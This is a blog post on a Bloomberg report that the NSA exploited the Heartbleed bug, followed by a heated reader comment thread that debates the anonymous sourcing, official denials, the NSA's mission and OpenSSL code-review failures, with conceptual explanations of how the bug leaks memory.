The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said. […]
Putting the Heartbleed bug in its arsenal, the NSA was able to obtain passwords and other basic data that are the building blocks of the sophisticated hacking operations at the core of its mission, but at a cost. Millions of ordinary users were left vulnerable to attack from other nations’ intelligence arms and criminal hackers.
“It flies in the face of the agency’s comments that defense comes first,” said Jason Healey, director of the cyber statecraft initiative at the Atlantic Council and a former Air Force cyber officer. “They are going to be completely shredded by the computer security community for this.”
At some point the NSA’s computer security mission should trump their eavesdropping mission. I would have though that point would be have been when the bulk of our networking and finance infrastructure is exposed to every hacker in the world. Since that wasn’t the case in one of the most serious and real security breaches in the history of the Internet, the obvious conclusion is that the NSA puts absolute primacy on their ability to eavesdrop, the security of US citizens and corporations be damned.
Mnemosyne
If you need to know which sites have been patched and are ready for you to change your password, CNET has a list.
J.Ty
I’m frankly a little surprised they didn’t write the bug themselves. Woudn’t have been the first time they meddled in open-source crypto affairs.
DocSardonic
OT Looks James “Jimmy the Pimple” O’Keefe got himself a scalp in Wisconsin…. http://talkingpointsmemo.com/livewire/mike-ellis-james-okeefe Don’t know enough about Wisconsin’s election laws as far as filing paper work but if the deadline has passed it may turn out to be an own goal since there is no primary challenger.
Cervantes
Don’t be silly. What is your security — and yours — and yours — as compared to the nation’s? Some degree of sacrifice is necessary. Ask not what your country can do for you and all that.
c u n d gulag
Why is that I’m not at all surprised?
Once you set-up a security operation, that operations continued existence becomes that organization’s first priority.
Anton Sirius
That’s progress, I suppose. Rather than relying on one anonymous, off-the-record source, Riley verified the story with a second anonymous, off-the-record source.
ranchandsyrup
From the NSA Public Affairs Office: Statement: NSA was not aware of the recently identified Heartbleed vulnerability until it was made public.
ORly?
Sinnach
Ah, anonymous unquotable sources saying the exact things we wanted to hear and guaranteeing thousands of page clicks. Truly the gold standard of modern journalism.
catclub
@Mnemosyne: There are also ssllabs and other sites, which will test the websites you are interested.
Schneier and Atlantic have links to what you need to do, which is change passwords, even if your needed site is not yet fixed. When it is fixed you will need to change again. Why? This way the last two years of collections are made useless and only the last few days collections against websites are useful.
It is a probability argument that the long period of unknown harm is more dangerous than the presumably short period of known risk.
Schlemizel
The odds are high that if NSA knew about it so did the Chinese Army and the Russian mafia, this is unforgivable.
Roger Moore
I think the computer security mission should trump the eavesdropping mission unless the vulnerability is one known not to affect American users. That may happen more subtly than making an announcement that we’ve found a bug- the DES business* is a good example- but defense should take priority. There are enough ways of breaking in and stealing information that patching bugs shouldn’t interfere with the NSA too badly. One of the things that showed up in the Snowden documents was a whole set of “tailored access operations” hardware designed to place surreptitious snooping devices in enemy networks, exactly the kind of skulduggery that spy agencies are supposed to be engaged in.
*When a previous generation encryption standard called DES was first proposed back in the 1970s, the NSA made some mysterious suggestions about tweaking some of the constants in the formula. It turns out that NSA had developed a new method of cryptanalysis that worked on the method as originally proposed but not after the tweaks. People figured this out quite a while later when the academic cryptography community re-invented the NSA’s method and realized that the tweaks eliminated the vulnerability.
Bill Arnold
That bloomberg piece left me fuming. Whether or not it was true, the asymmetry of the problem is real.
A possible fix would be for the IT industry to support open research into exploit generation tooling (“Automatic Exploit Generation” in the literature), maybe with big monetary prizes and competitions if they can be made resistant to gaming, and to encourage widespread usage of such tooling to checking existing open source code and changes to open source code. A few $10s of millions would go a long way. Does anybody know of any such proposals?
Schlemizel
@DocSardonic:
My guess would be that there is some provision for replacing a candidate, although it may only be after death so I am not sure. OTOH it sure is fun to think of the smirking bastards who thought this little prick was cool now have to worry they may not be pure enough to escape his slimy paw.
Villago Delenda Est
Heads need to roll at the NSA for this.
The “Security” in their name is a joke.
roc
@Schlemizel: It’s entirely possible that they only had reason to believe other agencies were leveraging the bug recently. Which may be why, after two years being in the wild, two different security researchers found this same exact vulnerability on the same exact day.
Or maybe it’s just coincidence, and those researchers were simply carefully reviewing every SSL implementation after gotofail was in the news.
It could be coincidence.
Bill Arnold
@efgoldman:
OK that was funny.
(Search google for “”the only part of government that actually listens” t-shirt if you want one. )
japa21
If this story is accurate, and that is a big if based u;pon previous NSA stories, they should be held to account for not letting people know. I will wait for something that actually backs up the story.
Belafon
I realize I’m pulling from wikipedia, but where in
does “must ensure the protection of US personal computers” fit?
different-church-lady
@Belafon:
Roger Moore
@roc:
Or they published it on the same day. In a lot of cases, researchers who discover a vulnerability will keep it quiet to give the vendor a chance to patch the vulnerability and come up with other mitigation methods. The whole thing, including a description of the exploit, the patches, and any mitigation methods are published at the same time to limit the time when the vulnerability is well known but unpatched. If more than one researcher discovers the vulnerability independently, they will both have a chance to publish simultaneously.
Villago Delenda Est
@Belafon: A HUGE part of the NSA’s mission is providing crypto for the military and the rest of the government. That would include, without much of stretch all communications security (COMSEC) related issues. If they in fact knew of a vulnerability in SSL and did nothing about it, this is more or less the equivalent of the USAF ignoring incoming planes about to bomb the country.
Roger Moore
@Belafon:
The part you’re missing is
Since there are almost certainly some government computers using OpenSSL- healthcare.gov is on the list of sites that may be vulnerable, for instance- they had a responsibility to do something about this bug when they found out about it.
Mandalay
@japa21:
Dead right. It is a big if. The source of the story is two anonymous people, there is no supporting evidence, and the claim cannot be refuted (How can the NSA possibly prove that they did nothing about this two years ago?).
If there was a negative story being posted about Obama with that level of credibility the BJ community would rip it to shreds.
As always, fuck the NSA. But unless something more substantive emerges about what they allegedly did based on the bug, then the NSA aspect of this story is a nothingburger.
srv
@Roger Moore: It will be hysterical if the exploit was used on healthcare.gov
Unless they absolutely know otherwise, someone should start prepping the public for that shitshow. Dozens of state exchanges and what not, the odds are not good.
Bill Arnold
Agreed, though Bloomberg has a reputation for being more reliable about leaks than most other business publications.
Baud
@Mandalay:
Agree. Being skeptical of the media (and I am) means being skeptical of the media. No exceptions for stories that reinforce our world view.
max
At some point the NSA’s computer security mission should trump their eavesdropping mission.
Concur with Mr. Moore. They are part of the Department of Defense, which means you do some defending.
I would have though that point would be have been when the bulk of our networking and finance infrastructure is exposed to every hacker in the world. Since that wasn’t the case in one of the most serious and real security breaches in the history of the Internet, the obvious conclusion is that the NSA puts absolute primacy on their ability to eavesdrop, the security of US citizens and corporations be damned.
Well, given what that fuckhead Hayden said, it seems pretty clear that at some point (1999 or earlier), the NSA decided it wasn’t interested in defense anymore. Post-911, it seems pretty clear they embraced the Gospel of the DC Idiotocracy and decided the way to get the defense bucks was to go completely over to the offense against everybody, including Americans. (If anyone recalls, DC post-911 was bubbling over about how we needed humint and we needed the CIA to be proactive and aggressive, and it sure seems like the NSA wanted in on the game.) It certainly seems General Alexander was totally committed to the concept, when he wasn’t blowing money on building Star Trek bridges and playing Captain Kirk.
max
[‘At this point it seems that if we want to protect American cyber security we’re going to need an entire new agency.’]
azlib
The NSA was certainly in a good position to explout this specific vulnerability, since they have the eavesdropping equipment installed in the NAPs already
A common criminal who knew about this bug would probably hang out at a local Starbucks with a laptop and sniff SSL packet streams on the open wireless network and then crack the encryption with the private keys it obtained earlier.
Mandalay
@Bill Arnold:
It’s worth pointing out that Blommberg carefully titled the article linked in the OP as “NSA Said to Exploit Heartbleed Bug for Intelligence for Years” rather than “NSA Exploited Heartbleed Bug for Intelligence for Years”.
So Bloomberg knows it is a suspect claim, but they decided to go ahead and publish it anyway.
Ernest Pikeman
I see the NSA bootlickers are already denying even the possibility that this could be true. Let’s see how soon “first world problem” and “dudebro” are trotted out, as “clickbait” was already deployed.
If you think an organization with a budget of billions, that employs thousands of cryptographers and security analysts, with a mission to find vulnerabilities, would NOT inspect every committed change into the most widely used crypto code library in the world, you are nuts. That’s their fucking job. It might take one competent guy some hours per day. This TLS heartbeat was a new feature – of course they (and the PLA, and a whole bunch of more unsavory types) would check it out. Some Snowden docs hinted that NSA could decrypt SSL traffic. This may be how, by getting hold of the private keys using Heartbleed.
The positive thing is that since the spooks are collecting vulnerabilities, it means the fundamentals of (at least some) encryption algorithms in use nowadays are probably OK. The OpenSSL project has been found unforgivably lax in their code review though. Hope this makes it better.
muddy
This is Al Gore’s fault for inventing the internet.
Baud
@Ernest Pikeman:
Please provide an example.
J.Ty
Sheesh, fine, I’ll be skeptical. It still wouldn’t be surprising if one or more groups knew of the vulnerability and didn’t tell anybody-and not just state actors, either. The knowledge would give you a ridiculous amount of power.
Ernest Pikeman
@Baud: See Anton Sirius and sinnach above.
srv
@Ernest Pikeman: IDK if it would be more of a scandal they did know or at $10’s of billions per year they didn’t know.
Mandalay
@Ernest Pikeman:
Not even close. It would be more accurate to state that those who distrust our media are denying the possibility that this must be true.
Anyone assuming that media allegations made against the NSA must be true without a shred of supporting evidence is highly gullible. If the shoe fits wear it.
Mnemosyne
If — and this is still a very big IF — this is true, we are about to see a major war between the NSA and the Department of Defense, because the Army, Navy, Air Force and Marines are going to be PISSED that the NSA put the armed forces at risk so the NSA could play spy games.
That’s the problem with complaining about “the government” — if this is true, it’s going to pit different parts of the government against each other. The DoD ain’t gonna shrug it off.
Ernest Pikeman
@srv: Heh, indeed.
(Always wanted to say that. Strike one line off the old bucket list!)
Higgs Boson's Mate
@Mandalay:
So please list for me what you actually know about the NSA’s methods and be certain to reassure me that no government agency has never, ever, acted in ways that might negatively affect those of us who pay the freight.
ya’ fucking tool.
guachi
I applaud the NSA-haters in thinking that the NSA is so awesome they found out about a bug up to two years before anyone else did.
I’ll let my fellow NSA employees know that their fellow citizens think so highly of their skills.
It’s certainly possible the NSA previously knew about this. But I’d not think that telling the whole world of the vulnerability was part of their job. Protecting both classified and unclassified defense networks, sure. But not a private company. But it might have been worth it if they suspected that other countries knew of the exploit.
Bob In Portland
Does anyone remember Danny Casolaro and the PROMIS software?
Higgs Boson's Mate
@Bob In Portland:
Does anyone remember SATAN? Worked with the guy who wrote it. My company decided to hire an accomplished hacker to fight off the less-accomplished ones.
Carolinus
@mistermix:
You should probably add to your post that the White House, DNI and NSA have all flatly & unequivocally denied this anomalously sourced allegation.
Mandalay
@Higgs Boson’s Mate:
You are proving the very point I made in post #24: “How can the NSA possibly prove that they did nothing about this two years ago?”.
Do you think that the claim made against the NSA by two unnamed sources is automatically true?
If you blindly believe the claim of two unnamed sources because it dovetails with your belief system then you are the fucking tool.
Ernest Pikeman
@Carolinus: Hehe, “anomalously sourced”. The Bloomberg article says:
Not quite a flat denial. You have links?
dr. bloor
They learned J. Edgar Hoover’s secret to longevity very well.
Roger Moore
@Ernest Pikeman:
That looks more like criticism of the quality of journalism- a valid critique that it’s based on anonymous sources telling people something they want to hear- not claiming that it’s impossible that the NSA is actually guilty. If you can’t tell the difference between “that’s impossible” and “this article is crappy evidence”, you’re about as credible as the article in question.
zoot
I hope…I just hope that when the big cyber attack/collapse occurs and the nation is in the toilet that they take their fvcking aircraft carriers, F-22 jet planes, stealth bombers, M-1 tanks and all the other useless crap they wasted $TRILLIONS on fighting the last war and pretending they all have big dicks, and shove them right up the a*ses of every senior official in the NSA and military.
Ernest Pikeman
@guachi: So you’re saying it’s not possible that multibillion dollar agency would have been able to keep up with a project that averages two code commits per day (about 11800 commits over 15 years – haven’t bothered to look at yearly stats).
Especially when it’s something that is very central to their mission.
Hmm.
I’m not saying NSA is super capable (they have middle managers like everybody else), but come on.
Carolinus
@Ernest Pikeman:
http://bnowire.com/inbox/?id=2307
http://www.nbcnews.com/tech/security/nsa-denies-it-used-heartbleed-bug-gather-intelligence-n78356
MomSense
@Mandalay:
Who are you and what have you done with Mandalay??
This Bloomberg story is based completely on anonymous sourcing. I don’t trust the NSA but c’mon this is not credible.
Baud
@Ernest Pikeman:
I read their comments the same way Roger Moore does, but I appreciate the response.
Cacti
@Mandalay:
Dead right. It is a big if. The source of the story is two anonymous people, there is no supporting evidence, and the claim cannot be refuted
Why you gotta go harsh on mistermix’s “ARGLEBLARGLE NSA!” for?
Higgs Boson's Mate
@Mandalay:
My experience of life is that government agencies eventually lose sight of anything other than self-perpetuatuation. Any method that advances the agency becomes okay. So, yes, I believe that the NSA used an exploitable bug and yes, you’re still a fucking tool.
guachi
@Ernest Pikeman:
Uhh…. what?
You wrote, “So you’re saying it’s not possible …”
This is what I wrote, “It’s certainly possible the NSA previously knew about this.”
Do you have reading comprehension problems?
Cacti
At some point the NSA’s computer security mission should trump their eavesdropping mission
And how do you square this particular circle with your recent “how dare the NSA gather intel on Chinese corporations!” screed?
srv
The DNI reponds
tl;dr: We iz incompetent
Carolinus
@Carolinus:
Oops, I forgot to add the DNI. Here’s that statement:
http://arstechnica.com/security/2014/04/nsa-used-heartbleed-nearly-from-the-start-report-claims/
Fair Economist
If the NSA *didn’t* know about this they should be closed down for incompetence. As spies, they are *supposed* to be looking for ways to crack security, and this kind of overflow bug is actually a fairly standard way to crack security.
Um – and who are you expecting to go on the record about NSA misdeeds? Snowden had it right in that nobody’s going to dare do that if they aren’t already on a flight out of the country.
Mandalay
@Higgs Boson’s Mate:
It takes a brave man to admit that he blindly accepts the word of two anonymous sources who provide no evidence. Good for you!
Mnemosyne
@Carolinus:
Again, this is why I said that IF — big if — this was true, it would cause a shitstorm inside the government the likes of which has never been seen before. The Social Security Administration uses OpenSSL. So does the IRS. And pretty much any other government agency that moves money around. Does anyone really think that the SSA and the IRS are going to think it was no big deal for them not to be told about this?
Anton Sirius
@Ernest Pikeman:
Nope, try again. I said no such thing.
Bill Arnold
@Carolinus:
That’s a pretty clear denial. Do you believe it? (I tend to believe the NSA/DNI iff they make extremely clear statements that can’t be parsed in multiple ways.)
srv
@Fair Economist: You know what this really proves?
[queue ominous music]
They didn’t need Heartbleed.
Cacti
Get your mistermix NSA rant! Hot and fresh! Now 100 percent fact-free, with an extra serving of breathless speculation.
Higgs Boson's Mate
@Mandalay:
I signed my life away before you were born, kid. I’m not particularly clever but I do have some experience of government agencies.
Carolinus
@Bill Arnold:
Yes. Just the title of the Bloomberg article makes it clear they have no other evidence beyond the two background claims. Bloomberg is equivocating while the gov’t is being unequivocal in its push-back on multiple fronts.
Comrade Mary
@Higgs Boson’s Mate: Dan Farmer! An old friend of mine from high school used to hang out with him and Muffy (geek BDSM scene in SF).
Ernest Pikeman
@guachi:
I was responding to this:
Then you backtracked and said this:
Followed by arglebargle that NSA should tell DOD etc but not private companies about a bug in an OPEN SOURCE library. How would that work, exactly?
CONGRATULATIONS!
@Belafon: Weirdly enough, it’s not in there. It’s really not their job. That job always has been and always will be domestic and foreign spying.
Terrifyingly enough, no agency has such a charter.
And we’re twenty years past the time when we need one.
Baud
@Fair Economist:
Why didn’t one of the large tech companies discover this sooner? Don’t they care about this stuff?
Higgs Boson's Mate
@Comrade Mary:
You got it. Dan knew more ways to break the internet than I can count.
ETA: No mention of router vulnerabilities of which there are so many.
Cacti
Speaking of Bloomberg News…
Remember back in November when they fired that reporter who spilled the beans on their editorial policy of spiking stories that “might anger China”?
Bill Arnold
@Carolinus:
Is there a .gov link for this? (Didn’t find one in a brief search.)
Anton Sirius
@srv:
It’s “cue”, unless you have a lot of music lined up.
Were you thinking sinister organ, creepy theremin, or Oldfield-esque noodling?
Thlayli
@Mandalay:
Of course it’s true, because … the government, amirite?
Besides, if the NSA did know about this, how come Saint Edward the Blower-of-Whistles didn’t tell us?
Higgs Boson's Mate
@Thlayli:
Fuck off and die. Thank you.
jl
@Anton Sirius:
Spooky music Walker, Theremin .
https://www.youtube.com/watch?v=XXOVJsuXerc
Mandalay
@Higgs Boson’s Mate:
Shame you didn’t bother to gain some experience of media bullshit.
gwangung
That the NSA knew of the bug and was exploiting it? Possible, very possible.
That they knew of it and DIDN’T let other government agencies know? Including DOD, and other defense agencies? Sorry, but that doesn’t pass the sniff test. They want to snoop WITHOUT allowing others to snoop the same way.
Ernest Pikeman
For the record, I’m not an “NSA hater” or whatever. They are a fact of life, and a fact I can’t really do anything about. I don’t think they are all that interested in me or my secrets. I’m not a threat. They have huge resources, and a lot of smart people. They could have a valid mission, but it seems they’ve been taken over by mission creep and bad management.
Reason I’m prepared to believe they *must* have known about this is that if they didn’t, what the hell are we paying them for? It does seem that their management is incompetent, as shown by L’Affaire Snowden. How in the hell is it possible that a tech contractor can exfiltrate huge amounts of classified information? I’m a sysadmin and I’ve set up monitoring and access controls for sysadmins’ access to data. It’s not that hard. Even my home network has boobytraps just for fun. If management heads didn’t roll after Snowden, it’s pretty hopeless. All I saw were reports that they fired techies. Yeah, that’ll show ’em.
If they really didn’t know? I want some management hauled in front of the Senate and asked why the hell not?
Mnemosyne
@gwangung:
To put it another way, if you work for the NSA, do you really want the IRS finding out that you screwed them over?
Mnemosyne
@Ernest Pikeman:
You do realize that’s a totally different question, right?
And, as I’ve said in other threads, the recent actions of the LA Sheriff’s Department make me lean much more to the side of “incompetence” rather than “conspiracy” when it comes to law enforcement. I have yet to see any of this ruthless efficiency that everyone keeps telling me I need to fear from the NSA.
srv
@Anton Sirius: Thx
I think Edvard Artemyev has all that and more, in proper context, 42 years ago.
Ernest Pikeman
@Mnemosyne: Sorry, I don’t see how some idiot LAPD cops have any relevance to a federal spook agency. NSA is not law enforcement.
I don’t think people are that afraid of the “ruthless efficiency” of NSA – that’s not the issue. The combination of narrow-and-deep technological competence with management incompetence is worrisome, as it invites abuse. And the fact they can just mumble “Security” and people stop questioning.
Origuy
I don’t understand what good the Heartbleed bug is to the NSA anyway. As I understand it, thanks to XKCD and other places, you send a request to echo a message with an incorrect message length and a broken server returns more data than you sent. Yes, that data is random garbage that may contain passwords, but they could be anyone’s passwords. The chance that the NSA could get back the password for a person of interest is vanishingly small.
Nathanael
If Keith Alexander was actually a Russian mole working for Vladimir Putin, he’d run the NSA *exactly the way he’s running it now*.
People should seriously think about that, and start a campaign to get Alexander and Clapper arrested for treason.
Cassidy
NSA denies it.
Nathanael
@Carolinus: DNI Clapper has confessed to committing perjury by lying to Congress. Obviously you can’t believe anything he says. Of course he’s going to deny the truth, again.
Just like a Russian mole would. The Russians are probably astounded that they’re still getting away with having moles running the CIA and NSA even *after* Snowden exposed them. ;-) It explains why Putin is completely unafraid of the US!
NR
Can’t wait for all you commenters to tell me what a nothingburger this is. It’s all a great big nothingburger, right?
Mnemosyne
@Ernest Pikeman:
So that magically makes the NSA competent?
Roger Moore
@Origuy:
The key is that you can keep asking for data until you read everything that’s there. Any piece of information that was in the server’s memory is vulnerable. That includes the server’s private encryption keys, which are basically the key to the store. If you have those keys, you can listen in to their communications even when they’re using encryption. If you have those keys and they aren’t using forward security, you can go back and decrypt previous communications that you stored but weren’t able to read at the time. It’s a genuine nightmare.
the Conster
So my husband, the Chief Technology Officer at a bank, has spent the last several days doing nothing but dealing with this. He has learned that this backdoor has been in place for over 2 years. He knows – as much as it’s possible to know – that it’s the NSA that created this breach. So, if it’s such an easy way to hack in now, why haven’t all of our accounts been wiped out and all of our credit cards been maxed out by the bad guys like russian hackers and chinese intelligence and who knows who? Because, he believes, the NSA is monitoring all unusual activity. This is what they can do – make sure that they know who and what is going on in internet commerce. If the bad guys try to do it, they also know they can be watched and tracked doing it, by the only agency on earth that can beat them at their game.
Roger Moore
@J.Ty:
That’s trickier than you might think. Any commit to a key Open Source program can be tracked down to its author. Since this kind of bug is likely to be caught eventually, you need to be very careful that the submission can’t be traced back to you. I suppose it’s possible that the guy who submitted this is actually a NSA mole, but given the rate at which actual bugs infest every piece of software, it seems more likely that it’s an ordinary bug.
Cervantes
@Roger Moore:
Yes, that’s the heart of the matter.
semperfi123
lol…just knew it someone was going to try involve the NSA somehow. Very low hanging clickbait fruit. Of course Snowden groupies like muckymux can’t resist taking a bit.
“two people familiar with the matter”. Sounds pretty convincing the me…sigh.
Belafon
@the Conster: Sorry, but your husband doesn’t know very much about software development then.
//
BTW, meet the US government agency charged with making our computers and internet secure: the US Computer Emergency Readiness Team (US-CERT), a part of Homeland Security.
Robert Sneddon
@Roger Moore: The problem was not the source code commit but that there was apparently no code review and no effective testing before this OpenSSL code was rolled out and implemented. It’s core code for security purposes on the entire internet worldwide and the code in question seems to have been given the same careful examination a CS101 student’s project would get from a teaching assistant doing the grading before bunking off for a pizza.
The bug is actually so bad it’s… it’s a bounds check failure permitting array overflows to return real data. Programmers stopped making that sort of a screwup in the 1990s after a bunch of security breaches happened because code didn’t verify arrays were properly bounded. There are tools to prevent bounds check failures slipping through code review. Compilers have switches that issue warnings or error out if bounds checking doesn’t happen or even force bounds checking at runtime automatically. There are languages that force bounds checking that can’t be disabled even if the programmer wigs out and screams “No bounds checking!” Test suites throw array overflows at alpha code and flag up warnings when the code returns real data rather than erroring out. And this still got through.
ruemara
I hate to point this out, but, this is a pair anonymous sources and they essentially are saying the immortal “could have” without documents that prove “really did”. Jesus. Too many people believe without having proof of what they believe. Not saying they did or didn’t, just that you can’t bitch out the right for fearmongering and then jump whole hog into some people say territory.
Roger Moore
@Robert Sneddon:
My understanding is that it’s actually the opposite of the traditional stack smashing array bounds check failure. In a regular array bounds failure, you give a program an input that’s longer than the space allotted for it. If the program doesn’t check there’s enough space, it can write past the end of the allotted space and overwrite memory that it shouldn’t be allowed to write. If you understand the program, you can overwrite an executable part of the code with your own code and take control of the system.
With the heartbleed attack, the attacker is allowed to provide a piece of information that’s supposed to be sent back and the length of the material that’s supposed to be returned. If the length that’s supposed to be returned is longer than the length of the information sent, OpenSSL would happily keep reading whatever followed what it was supposed to return. The problem is that it’s conceptually similar but sufficiently different in implementation that the automated tools and functions designed to defend against stack smashing attacks will miss it.
different-church-lady
@guachi:
Aren’t you making a big assumption by asserting comprehension was the point of the endeavor?
different-church-lady
@Ernest Pikeman: Ah. So in other words you’re just flying on your gut, no different from anyone else, eh?
different-church-lady
@Origuy: Not even if they use that massive googlehertz super-duper computer with eleventy billion terraflops that’s using up all the water in Utah?
different-church-lady
@the Conster: I ain’t trying to sniff anything out here, but do you mind giving me the name of that bank so I can assure myself I’ll never open an account there?
different-church-lady
@Roger Moore: Considering that the guy responsible has already spoken up, drastic measures to find him will not be necessary.
liberal
@Roger Moore:
I don’t know the details, but if RS’s scenario were true, someone would have caught it earlier, I would assume—since presumably quite a few people compile from source and would have had the compiler flags he alludes to turned on.
Carolinus
@efgoldman:
Yeah, that never happened. Clapper copped to misunderstanding the question, bungling his response and then later clarifying the record in a letter to congress. I get that many here don’t believe him, and feel he perjured himself, but he’s never “confessed” that he did.
Carolinus
@the Conster:
We know who’s responsible for committing the problem code 2 yrs ago. It was a German developer:
http://www.smh.com.au/it-pro/security-it/man-who-introduced-serious-heartbleed-security-flaw-denies-he-inserted-it-deliberately-20140410-zqta1.html
different-church-lady
@Carolinus: Oh, that’s easy: we just a a pinch of argle-bargle and we get “Seggelmann’s an NSA agent” goulash.
Carolinus
@efgoldman:
Ack! Sorry about that. I clicked reply on the wrong post. The post that blockquote was from was #90 (Nathanael’s), one up from the post of yours I incorrectly replied to. I’d fix it if I could still edit it. Again, my apologies.
Anton Sirius
@the Conster:
Sorry, that’s utter bullshit.
You want to believe the NSA knew about it and exploited it? Fine, it’s possible.
You want to believe the NSA created it? The lizard people are waiting fnord you behind door number two, OPE POE EOP. Do not adjust your set.
Anton Sirius
@Cervantes:
I’m thinking about forgiveness.
Mandalay
@Robert Sneddon:
Sure it was potentially a very serious problem, but there’s no need to be a condescending know-it-all about it. You are talking about a bug in a piece of code that may have been executed trillions of times, and was only just discovered after two and a half years. There is the possibility that a “bad guy”, or even the NSA, had previously discovered it, but there is no evidence of that to date.
Unless you have actually looked at the code that was written you simply cannot know that to be true. And the person who wrote the code states that it was a validation error.
Stop trying to prove that you are the smartest guy in the room. You are having the opposite effect.
LT
Does anyone else remember Cheney making a big show of shredding official documents while in office (“like Nixon should have done”)?
He ostentatiously destroyed (circa 2007-2008) public records, within the walls of the official residence of the vice president of the United States. The trucks hired trucks to haul the shredded material away filled the street outside our federal building. Network and cable “news” reported their presence, but not much more. The democratic party didn’t squawk, either. As in “nary a peep” didn’t squawk.
Curious, huh?
AxelFoley
@Schlemizel:
Thanks,
ObamaSnowden.Tripod
Open source community shits bed, blames NSA.
Robert Sneddon
@Mandalay: Anything to do with SSL is mission-critical security code, same with cryptographic modules, certificate handling etc. It should undergo in-depth review, failure analysis and thorough testing before being released. This was just thrown out there and integrated into systems with the assumption it wasn’t wrong, after a demonstrably inadequate review and testing process.
Saying that the SSL heartbeat process isn’t a security issue in itself, any other heartbeat process could have caused the same problem if the same sort of code flaw had been allowed to get through review and testing. I am puzzled as to why the SSL heartbeat had an arbitrary payload, heartbeat processes I’ve written code for (we called them stayawake but they fulfilled the same purpose) used fixed-size fixed-format packets coded as constants so they never used data space RAM for buffering. There are probably good reasons, I’ve not dug that deeply into the documentation.
Cervantes
@Anton Sirius:
That’s nice, I’m sure, but what’s your point?
NonyNony
@Robert Sneddon:
Despite what you’re saying above, this describes almost all of the software on the Internet. Code review is hard, testing is hard, and mistakes happen all of the time. Given the description of the problem and the fact that it’s been two freaking years since it was added to the codebase and nobody caught it – despite the fact that dedicated professional and amateur security professionals hammer SSL code all of the time looking for vulnerabilities – it doesn’t seem to be outside the realm of possibility that it slipped through testing because of a mistake.
Million dollar bugs slip through testing all the time. I suspect that this one only got caught because some folks are being extra super critical about auditing SSL code given the gotofail mess a few months back.
(News flash for the non-programmers out there – most of the code you use is poorly written, poorly understood, and poorly tested before it gets rolled out for public use. And this includes all the security software and all of the financial services software used by your banks and insurance companies. This is why it was a fundamentally stupid mistake to move all financial transactions away from dedicated point-to-point terminals and onto encrypted Internet connections when it was done – the tech wasn’t ready. And really it still isn’t. The algorithms are theoretically sound but they get implemented by human beings and human beings introduce errors. And it is not theoretically possible to prove that your code is error free, so you’re stuck with testing to find bugs. And testing can only find bugs – it can’t prove that your code is correct – and it can only find the bugs that you think to look for. If you don’t think of a particular way a piece of code might fail and write a test for it, you’ll never find the problem. This is why companies that do things like mission critical aircraft software spend a huge chunk of money on testing – to try to find all the ways that code might fail. And if you believe that the banks and insurance companies and other folks who have implemented this software for financial transactions have spent the level of money to develop and test it that, say, Boeing uses to develop and test its mission critical aircraft software that runs airplanes you are mistaken. It’s nowhere close. Testing is always the first thing to get cut when budgets run over and deadlines get missed.)